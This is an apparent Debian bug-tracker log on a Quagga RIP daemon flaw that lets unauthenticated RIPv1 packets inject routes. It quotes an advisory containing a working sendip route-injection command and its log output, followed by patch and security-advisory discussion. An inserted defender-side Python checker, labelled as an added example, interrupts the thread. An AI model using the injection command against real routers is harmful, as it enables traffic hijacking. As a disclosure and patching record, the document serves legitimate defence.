SECURITY: Quagga RIPD unauthenticated route injection

Related Vulnerabilities: CVE-2006-1519   CVE-2006-2223   CVE-2006-2224   CVE-2006-2276  

Debian Bug report logs - #365940


Reported by: Christian Hammers <ch@debian.org>

Date: Wed, 3 May 2006 20:48:31 UTC

Severity: grave

Tags: security

Fixed in version quagga/0.99.3-2

Done: Christian Hammers <ch@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org:
Bug#365940; Package quagga.


Acknowledgement sent to Christian Hammers <ch@debian.org>:
New Bug report received and forwarded.


Message #5 received at submit@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: submit@bugs.debian.org
Subject: SECURITY: Quagga RIPD unauthenticated route injection
Date: Wed, 3 May 2006 22:45:57 +0200
[Message part 1 (text/plain, inline)]
Package: quagga
Severity: grave
Justification: user security hole
Tags: security

Affected:
 0.98.3: most probably; DSA for Sarge needed; patch in preparation
 0.99.x: yes, upload to unstable in preparation

In short:
 Attacker can inject routes to a Quagga router that talks RIPv1 even
 if RIPv2 authentication has been enabled.

bye,

-christian-
[Message part 2 (message/rfc822, inline)]
Date: Wed, 3 May 2006 17:01:16 +0200
From: "Paul Jakma" <paul@clubi.ie>
To: <kbo@allevil.dishone.st>
Cc: maintainers@quagga.net,
	Quagga Users <quagga-users@lists.quagga.net>,
	full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [quagga-users 6838] Re: Quagga RIPD unauthenticated route injection

Hi Konstantin,

Thanks for these reports. Quagga bug #262 has been opened for the
issue below, see:

 	http://bugzilla.quagga.net/show_bug.cgi?id=262

The former report is assigned as Quagga bug #261:

 	http://bugzilla.quagga.net/show_bug.cgi?id=261

Comments are there regarding the scope of the information leak (the
reply is unicasted with default TTL).

Bug #262 has proposed patches attached to solve both issues.

It does not restrict the scope of unicasted RIPv1 replies. It is
suggested that users either disallow RIPv1 entirely or firewall RIP
at network boundaries if RIPv1 must be used.

Thanks very much for your reports and assistance.

--paulj

On Wed, 3 May 2006, Konstantin V. Gavrilenko wrote:

> Arhont Ltd - Information Security
>
> Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
> Arhont ref:	arh400604-2
> Advisory:	Quagga RIPD unauthenticated route injection
> Class:		design bug?
> Version:	Tested on Quagga suite v0.98.5 v0.99.3 (Gentoo, 2.6.15)
> Model Specific:	Other versions might have the same bug
>
>
> DETAILS
> It is possible to inject a custom malicious route into the quagga RIP
> daemon using the RIPv1 RESPONSE packet even if the quagga has been
> configured to use MD5 authentication.
>
> The prerequisite to the attack is the absence of the specific version of
> the protocol in the router rip configuration. This way, quagga accepts
> authenticated RIPv2 and also RIPv1 packets, that do not have
> authentication mechanism at all.
>
> configuration of the ripd
> key chain dmz
> key 1
>  key-string secret
> !
> interface eth0
> ip rip authentication mode md5 auth-length old-ripd
> ip rip authentication key-chain dmz
> !
> router rip
> redistribute static
> network eth0
>
> arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p
> rip -rv 1 -rc 2  -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100
>
> RIPD LOG
> 2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
> 2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
> 2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
> 2006/05/02 16:06:45 RIP: Resultant route 192.168.36.0
> 2006/05/02 16:06:45 RIP: Resultant mask 255.255.255.0
> 2006/05/02 16:06:45 RIP: triggered update!
>
>
> RISK FACTOR: Medium
>
>
> WORKAROUNDS: Implement the patch for the ripd or firewall the access to
> the ripd daemon on the need to access basis.
>
>
> COMMUNICATION HISTORY:
> Issue discovered:	  10/04/2006
> quagga notified:	  24/04/2006
> Public disclosure:	  03/05/2006
>
> ADDITIONAL INFORMATION:
> *According to the Arhont Ltd. policy, all of the found vulnerabilities
> and security issues will be reported to the manufacturer at least 7 days
> before releasing them to the public domains (such as CERT and BUGTRAQ).
>
> If you would like to get more information about this issue, please do
> not hesitate to contact Arhont team on info@arhont.com
>
>
>

-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
Real Users are afraid they'll break the machine -- but they're never
afraid to break your face.
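
A defender-side check for the condition the advisory describes, as an added example (not code from Quagga, Debian or Arhont): it flags interfaces in a ripd.conf that have RIP authentication configured but still accept RIPv1, then picks RIPv1 RESPONSE packets on those interfaces out of ripd debug logs. It assumes ripd's `version` (under `router rip`) and `ip rip receive version` commands, which are not shown on this page, as the way RIPv1 is disallowed; the function names and the 16:07:10 log entry are constructed.

```python
import re

# Constructed sample: the ripd configuration quoted in the advisory.
SAMPLE_CONF = """\
key chain dmz
key 1
 key-string secret
!
interface eth0
ip rip authentication mode md5 auth-length old-ripd
ip rip authentication key-chain dmz
!
router rip
redistribute static
network eth0
"""

# Log lines in the advisory's format; the 16:07:10 entry is constructed for contrast.
SAMPLE_LOG = """\
2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
2006/05/02 16:07:10 RIP: RECV packet from 192.168.69.101 port 520 on eth0
2006/05/02 16:07:10 RIP: RECV RESPONSE version 2 packet size 44
"""

RECV_FROM = re.compile(r"^(\S+ \S+) RIP: RECV packet from (\S+) port \d+ on (\S+)$")
RECV_V1 = re.compile(r"RIP: RECV RESPONSE version 1 packet size \d+$")


def interfaces_accepting_ripv1(conf_text):
    """Interfaces with RIP authentication configured whose receive versions include 1."""
    section, iface = None, None
    global_versions = {1, 2}  # with no 'version' line, ripd accepts RIPv1 and RIPv2
    auth, recv = set(), {}
    for line in (raw.strip() for raw in conf_text.splitlines()):
        if m := re.match(r"interface\s+(\S+)$", line):
            section, iface = "interface", m.group(1)
        elif re.match(r"router\s+rip$", line):
            section = "router rip"
        elif re.match(r"(router|key chain|line|route-map)\b", line):
            section = "other"
        elif section == "router rip" and (m := re.match(r"version\s+([12])$", line)):
            global_versions = {int(m.group(1))}  # assumed command, see lead-in
        elif section == "interface" and line.startswith("ip rip authentication "):
            auth.add(iface)
        elif section == "interface" and (
            m := re.match(r"ip rip receive version\s+(.+)$", line)
        ):
            # Per-interface override of the global setting (assumed command).
            recv[iface] = {int(v) for v in m.group(1).split() if v.isdigit()}
    return sorted(i for i in auth if 1 in recv.get(i, global_versions))


def ripv1_responses(log_text, watched_ifaces):
    """(timestamp, source, interface) for each RIPv1 RESPONSE seen on a watched interface."""
    hits, last = [], None
    for line in log_text.splitlines():
        if m := RECV_FROM.match(line):
            last = m.groups()  # remember who sent the packet being decoded
        elif RECV_V1.search(line) and last and last[2] in watched_ifaces:
            hits.append(last)
            last = None
    return hits


if __name__ == "__main__":
    exposed = interfaces_accepting_ripv1(SAMPLE_CONF)
    print("auth configured but RIPv1 accepted:", exposed)
    for when, src, iface in ripv1_responses(SAMPLE_LOG, set(exposed)):
        print(f"{when} RIPv1 RESPONSE from {src} on {iface}")
```
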





Message #10 received at 365940@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: 365940@bugs.debian.org
Subject: Re: [quagga-users 6839] Re: Quagga RIPD unauthenticated route injection
Date: Thu, 4 May 2006 00:58:15 +0200
Notes from the upstream author. Maybe we should wait a day or two with
the DSA as it could break something with the current patch.

bye,

-christian-


On 2006-05-03 Paul Jakma wrote:
> On Wed, 3 May 2006, Christian Hammers wrote:
> 
> > Can I use the second version of the patch to prepare the Debian 
> > security updates or should I rather wait until you have a cleaner 
> > patch?
> 
> The patch itself is clean, however it changes the default 
> authentication type - which isn't the best thing to do for 0.98. I 
> need to change it to leave the default alone so it can be releasable.
> 
> > Apropos, the patch cleanly applies to version 0.98.3 which was the 
> > one shipped with the last Debian release. Can I safely use it and 
> > does it fix the problem in 0.98.3, too?
> 
> Yes. But see above.





Message #15 received at 365940@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: team@security.debian.org, 365940@bugs.debian.org
Subject: Files for a Quagga DSA (RIPD unauthenticated route injection)
Date: Thu, 04 May 2006 20:35:28 +0200
[Message part 1 (text/plain, inline)]
Hello

Attached you will find a diff that can be used to make a DSA for the
recent Quagga security bug.

The diff contains four files in debian/patches/CVE* that the upstream
author recommended me in
 http://lists.quagga.net/pipermail/quagga-users/2006-May/006845.html
to use for version 0.98.3 as well as the result of applying them:
 $ interdiff -z quagga_0.98.3-7.diff.gz quagga_0.98.3-7.1.diff.gz | diffstat
 debian/patches/CVE-2006-1519_part1.diff |  338 ++++++++++++++++++++++++++++++++
 debian/patches/CVE-2006-1519_part2.diff |  182 +++++++++++++++++
 debian/patches/CVE-2006-1519_part3.diff |   70 ++++++
 debian/patches/CVE-2006-1519_part4.diff |   64 ++++++
 doc/ripd.texi                           |  126 ++++++++---
 quagga-0.98.3/debian/changelog          |    9 
 ripd/rip_interface.c                    |   37 ++-
 ripd/ripd.c                             |  205 +++++++++----------
 8 files changed, 885 insertions(+), 146 deletions(-)

The proposed DSA text (with text stolen from CVE) is:

 DSA-XXXX-1 quagga -- ripd unauthenticated route injection

 Date Reported:
    03 May 2006
 Affected Packages:
    quagga 
 Vulnerable:
    Yes
 Security database references:
    In the Bugtraq database (at SecurityFocus): BugTraq ID 17808.
    In Mitre's CVE dictionary: CVE-2006-1519.
 More information:
    Konstantin V. Gavrilenko discovered that Quagga is susceptible to
    remote information-disclosure and route-injection vulnerabilities.
    The application fails to properly ensure that required authentication
    and protocol configuration options are enforced.

    These issues allow remote attackers to gain access to potentially
    sensitive network-routing configuration information and to inject
    arbitrary routes into the RIP routing table. This may aid malicious
    users in further attacks against targeted networks.

    The old stable distribution (woody) does not contain quagga packages.

    For the stable distribution (sarge) this problem has been fixed in version 0.98.3-7.1.

    For the unstable distribution (sid) this problem has been fixed in version 0.99.3-2.

    We recommend that you upgrade your quagga package.


bye,

-christian-
[quagga_0.98.3-7.1.diff.gz (application/octet-stream, attachment)]
[signature.asc (application/pgp-signature, inline)]

Reply sent to Christian Hammers <ch@debian.org>:
You have taken responsibility.


Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer.


Message #20 received at 365940-close@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: 365940-close@bugs.debian.org
Subject: Bug#365940: fixed in quagga 0.99.3-2
Date: Thu, 04 May 2006 14:06:07 -0700
Source: quagga
Source-Version: 0.99.3-2

We believe that the bug you reported is fixed in the latest version of
quagga, which is due to be installed in the Debian FTP archive:

quagga-doc_0.99.3-2_all.deb
  to pool/main/q/quagga/quagga-doc_0.99.3-2_all.deb
quagga_0.99.3-2.diff.gz
  to pool/main/q/quagga/quagga_0.99.3-2.diff.gz
quagga_0.99.3-2.dsc
  to pool/main/q/quagga/quagga_0.99.3-2.dsc
quagga_0.99.3-2_amd64.deb
  to pool/main/q/quagga/quagga_0.99.3-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 365940@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christian Hammers <ch@debian.org> (supplier of updated quagga package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu,  4 May 2006 00:22:09 +0200
Source: quagga
Binary: quagga quagga-doc
Architecture: source amd64 all
Version: 0.99.3-2
Distribution: unstable
Urgency: high
Maintainer: Christian Hammers <ch@debian.org>
Changed-By: Christian Hammers <ch@debian.org>
Description: 
 quagga     - unoff. successor of the Zebra BGP/OSPF/RIP routing daemon
 quagga-doc - documentation files for quagga
Closes: 365940
Changes: 
 quagga (0.99.3-2) unstable; urgency=high
 .
   * SECURITY:
     Added security bugfix patch from upstream BTS for security problem
     that could lead to injected routes when using RIPv1.
     Closes: #365940
   * First amd64 upload.
Files: 
 59a0a5ae7c1991f36b3eaa34b916d70b 752 net optional quagga_0.99.3-2.dsc
 d05c0eba30402621c144bf1a363a59b0 29322 net optional quagga_0.99.3-2.diff.gz
 629b02d4563db0708da09e4f1412f265 663124 net optional quagga-doc_0.99.3-2_all.deb
 d3049348b80e0ad813c55eb457b3673b 1406676 net optional quagga_0.99.3-2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iEYEARECAAYFAkRaS+MACgkQkR9K5oahGOafwACePQL0qM4/a/vXJRbIwiogZB2W
+hkAnRtBJnZtFyESMNqIrdZE0IHFX6Fi
=OwCG
-----END PGP SIGNATURE-----






Message #25 received at 365940@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Christian Hammers <ch@debian.org>
Cc: 365940@bugs.debian.org
Subject: Re: Bug#365940: Files for a Quagga DSA (RIPD unauthenticated route injection)
Date: Fri, 05 May 2006 15:06:53 +0200
* Christian Hammers:

> Attached you will find a diff that can be used to make a DSA for the
> recent Quagga security bug.

Your proposal does not mention the behavior change which was alluded
to by upstream.  Is this intentional?





Message #30 received at 365940@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 365940@bugs.debian.org
Subject: Re: Bug#365940: Files for a Quagga DSA (RIPD unauthenticated route injection)
Date: Fri, 5 May 2006 15:14:28 +0200
Hello Florian

On 2006-05-05 Florian Weimer wrote:
> * Christian Hammers:
> 
> > Attached you will find a diff that can be used to make a DSA for the
> > recent Quagga security bug.
> 
> Your proposal does not mention the behavior change which was alluded
> to by upstream.  Is this intentional?

Paul mentioned a behavior change in his mail from Wed May 3 23:57h
saying that this was no releasable state and then replied to this
mail on Thu May 4 17:19h announcing the changeset for a 0.98 RC version.
I understood it as if he had fixed this flaw in the meantime.

But it's probably really better to check so I will ask him.

bye,

-christian-





Message #35 received at 365940@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: Paul Jakma <paul@clubi.ie>
Cc: Quagga Users <quagga-users@lists.quagga.net>, 365940@bugs.debian.org
Subject: Re: [quagga-users 6843] Re: Quagga RIPD unauthenticated route injection
Date: Fri, 5 May 2006 15:52:01 +0200
Hello Paul

On 2006-05-04 Paul Jakma wrote:
> Hi Christian,
> 
> On Wed, 3 May 2006, Paul Jakma wrote:
> 
> > The patch itself is clean, however it changes the default 
> > authentication type - which isn't the best thing to do for 0.98. I 
> > need to change it to leave the default alone so it can be 
> > releasable.
> 
> See CVS for what is now 0.98.6-RC[1]. If you want just the ripd 
> specific changes for 0.98, for just an 0.98.5 update, see:

Just to be sure, "RC" means that the patch is now in a releasable
state and does no longer change the default behaviour?
Or if it does, could it cause any trouble?

bye,

-christian-





Message #40 received at 365940@bugs.debian.org:

From: Paul Jakma <paul@clubi.ie>
To: Christian Hammers <ch@debian.org>
Cc: Quagga Users <quagga-users@lists.quagga.net>, 365940@bugs.debian.org
Subject: Re: [quagga-users 6843] Re: Quagga RIPD unauthenticated route injection
Date: Fri, 5 May 2006 15:31:05 +0100 (IST)
Hi Christian,

On Fri, 5 May 2006, Christian Hammers wrote:

> Just to be sure, "RC" means that the patch is now in a releasable 
> state

Yes. The 0.98 CVS branch is now in the "this is what we intend to 
release as 0.98.6" state.

> and does no longer change the default behaviour?

The defaults are unchanged.

The difference in 0.98 now is that the 'no ip rip authentication 
mode' will actually set "no authentication". It will write out such 
as well, that should allow everything to remain compatible, and also 
allow any 0.98 users to upgrade to 0.99 in a compatible manner 
(provided they 'write file' in 0.98.6+ before going to 0.99, or at 
least, take heed of either the output of 'show running-config' or the 
updated documentation - the section on "RIP Authentication").

> Or if it does, could it cause any trouble?

Wrt ripd:

upgrading from <= 0.98.5 to >= 0.98.6 shouldn't be any trouble - as 
the defaults remain the same.

upgrading from >= 0.98.6 to 0.99+ should be ok too, except that any 
users who relied on simple-auth being the default will need to have 
either:

- done a 'write file' in >=0.98.6 any time before upgrading
- or taken heed of the documentation in 0.98.6 and manually updated
  their ripd.conf
- or noticed that 0.98.6+ 'show running-config' output has changed,
  and explicitly outputs 'ip rip authentication mode text', and
  hence taken that as their cue to update their ripd.conf

ie for users who don't use 'write file' to maintain their ripd.conf, 
there are two 'cues' that things have changed - the docs and 'show 
running-config'. If they take heed of those cues, then they won't have 
problems upgrading later to 0.99+.

RIPv2 MD5 authentication users would be fine (and hopefully anyone 
using RIPv2 authentication is using MD5) - nothing changes there.

Make sense? :)

regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
Beware of geeks bearing graft.





Message #45 received at 365940@bugs.debian.org:

From: Martin Schulze <joey@infodrom.org>
To: Christian Hammers <ch@debian.org>
Cc: team@security.debian.org, 365940@bugs.debian.org
Subject: Re: Files for a Quagga DSA (RIPD unauthenticated route injection)
Date: Sat, 13 May 2006 14:54:27 +0200
Christian Hammers wrote:
> Attached you will find a diff that can be used to make a DSA for the
> recent Quagga security bug.

Thanks a lot for preparing the update.

Please also mention CVE-2006-2223 CVE-2006-2224 in the unstable changelog
when you're doing the next upload anyway.

Regards,

	Joey

-- 
Linux - the choice of a GNU generation.

Please always Cc to me when replying to me on the lists.





Message #50 received at 365940@bugs.debian.org:

From: Christian Hammers <ch@debian.org>
To: Martin Schulze <joey@infodrom.org>
Cc: team@security.debian.org, 365940@bugs.debian.org
Subject: Re: Files for a Quagga DSA (RIPD unauthenticated route injection)
Date: Sat, 13 May 2006 19:47:53 +0200
On 2006-05-13 Martin Schulze wrote:
> Christian Hammers wrote:
> > Attached you will find a diff that can be used to make a DSA for the
> > recent Quagga security bug.
> 
> Thanks a lot for preparing the update.
> 
> Please also mention CVE-2006-2223 CVE-2006-2224 in the unstable changelog
> when you're doing the next upload anyway.

Please wait a day or two with the Quagga DSA, there has been one further
security problem reported yesterday in Bug 366980

 CVE-2006-2276:
 bgpd in Quagga 0.98 and 0.99 before 20060504 allows local users to
 cause a denial of service (CPU consumption) via a certain sh ip bgp
 command entered in the telnet interface.

 See
 http://www.quagga.net/news2.php?y=2006&m=5&d=4#id1146764580

I prepare unstable now and stable today or tomorrow...

bye,

-christian-



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 25 Jun 2007 08:07:16 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:31:31 2019; Machine Name: buxtehude
